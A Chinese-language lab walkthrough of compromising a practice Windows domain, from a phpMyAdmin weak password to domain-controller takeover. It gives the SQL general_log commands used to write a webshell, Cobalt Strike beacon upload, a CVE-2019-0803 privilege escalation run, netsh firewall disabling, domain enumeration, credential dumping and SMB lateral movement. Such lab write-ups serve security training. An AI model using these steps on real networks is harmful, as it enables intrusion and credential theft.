靶机搭建就不说了,之前做过视频
现在环境和密码是改好的
网络配置
Win7:
Win2008:
Win2K3:
IP | |
---|---|
攻击机(物理机) | 192.168.55.1 |
Win7 | 内:192.168.52.143 / 外:192.168.55.128 |
Win2008 | 192.168.52.138 |
Win2K3 | 192.168.52.141 |
外网打点
先查看Web服务器IP:
外网:
内网:
开启PHPStudy
访问是个探针,里面包含了站点绝对路径,php版本等信息
扫描目录
发现了phpinfo、phpmyadmin等信息
弱口令root/root进入后台
这里使用phpmyadmin日志写shell,先查看有没有开启日志
SHOW VARIABLES LIKE "%SECURE%"
这里开启日志
SET GLOBAL general\_log = 'on'
设置日志路径,绝对路径在探针里有的
SET GLOBAL general\_log\_file = "C://phpStudy/WWW//shell.php"
设置成功后写马
SELECT ""
蚁剑连接
内网信息搜集
在蚁剑的命令行执行相关命令即可
两张网卡分别是内外网
查看当前登录的域和登录用户信息
有三台主机
域为GOD,DNS为god.org
查看域控
查看域管
查看域成员
信息搜集完成,下一步更深层次的上线CS再进行
CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可
成功上线
深层次的信息搜集
查看主机名
shell net users
查看用户列表
shell net users
查看域管
shell net localgroup administrators
接下来对拿下的web服务器提权
查看系统版本
systeminfo
提权
搜不到对应的提权EXP
尝试经典的CVE-2019-0803吧
上传CVE-2019-0803.exe到服务器,然后执行命令
shell CVE-2019-0803.exe cmd "start ta.exe"
随后上线system权限的机器
查看任务列表
shell tasklist
没有防护软件(肯定没有,不然我那个无免杀的CS马早被杀了)
查看防火墙状态
shell netsh firewall show state
关闭防火墙
shell netsh advfirewall set allprofile state off
域渗透
查看当前域内列表
net view
在CS执行成功后,它自己会将这些主机添加进去
查看域控列表
net dclist
这里先抓取服务器凭证
抓取明文密码
创建SMB监听器
可以看到拿下域控OWA
然后使用OWA的session去打另一个
拿下
小知识:
1、提权把systeminfo信息放一些在线查询的网站上搜可利用的提权方式即可,我这个就是搜到的CVE-2019-0803,这个工具执行命令权限很高,运行之前的CS马就会以system权限上线
2、后面那些psexec、smb是什么?psexec是微软的一个工具,可以用它来提权,而这里它的原理就是通过命名管道使用SMB服务在远程主机上执行powershell